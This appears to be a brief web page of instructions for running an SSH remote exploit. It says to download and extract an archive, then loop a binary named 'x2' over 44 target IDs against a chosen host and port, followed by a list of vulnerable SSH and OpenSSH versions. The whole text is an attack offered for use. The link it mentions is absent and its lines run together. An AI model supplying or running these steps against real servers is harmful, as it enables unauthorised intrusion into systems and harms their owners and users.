First you need to download it from here. Then you must extract it.
tar zxvf 349.tgz
cd sshThen run the exploit against your host.
for i in {1..44}; do ./x2 -t$i <host> <port>; doneTarget: Small - SSH-1.5-1.3.7-10Target: Small - SSH-1.5-1.2.24-31Target: Small - SSH-1.5-1.2.27Target: Small - SSH-1.5-1.2.31Target: Small - SSH-1.5-1.3.07Target: Small - SSH-1.5-1.3.6_F-SECURE_SSHTarget: Small - SSH-1.5-1.3.6_F-SECURE_SSH-2Target: Small - SSH-1.5-OpenSSH-1.2Target: Small - SSH-1.5-OpenSSH-1.2.1-3Target: Small - SSH-1.5-OpenSSH-2.1Target: Small - SSH-1.99-OpenSSH-2.1.1Target: Small - SSH-1.99-OpenSSH-2.2.0Target: Small - SSH-1.99-OpenSSH_2.5.2p2Target: Small - SSH-1.99-OpenSSH_1.2.3Target: Small - SSH-1.99-OpenSSH-2.2.0p1Target: Small - SSH-1.99-OpenSSH_2.3.0p1Target: Small - SSH-1.99-OpenSSH_2.2.0p1Target: Small - SSH-1.99-OpenSSH_2.1.1Target: Small - SSH-1.99-OpenSSH_2.2.0p1Target: Small - SSH-1.99-OpenSSH_2.2.0p1-2Target: Small - SSH-1.99-OpenSSH_2.1.1Target: Big - SSH-1.5-1.3.7-10Target: Big - SSH-1.5-1.2.24-31Target: Big - SSH-1.5-1.2.26Target: Big - SSH-1.5-1.2.27Target: Big - SSH-1.5-1.2.30Target: Big - SSH-1.5-1.2.31Target: Big - SSH-1.5-1.3.6_F-SECURE_SSHTarget: Big - SSH-1.5-OpenSSH-1.2.2Target: Big - SSH-1.5-OpenSSH-1.2Target: Big - SSH-1.5-OpenSSH-1.2.1-3Target: Big - SSH-1.5-OpenSSH-2.1Target: Big - SSH-1.99-OpenSSH-2.1.1Target: Big - SSH-1.99-OpenSSH-2.2.0Target: Big - SSH-1.99-OpenSSH_2.2.0p1Target: Big - SSH-1.99-OpenSSH-2.2.0p1-2Target: Big - SSH-1.99-OpenSSH_2.3.0p1Target: Big - SSH-1.99-OpenSSH_2.5.2p2Target: MNS xlong - SSH-1.99-OpenSSH_2.2.0p1Target: MNS xlong - SSH-2.99-OpenSSH_2.2.0p1Target: MNS quick - SSH-1.5-OpenSSH-1.2.2Target: MNS quick - SSH-1.5-1.2.25Target: Big - SSH-1.99-OpenSSH_2.2.0p1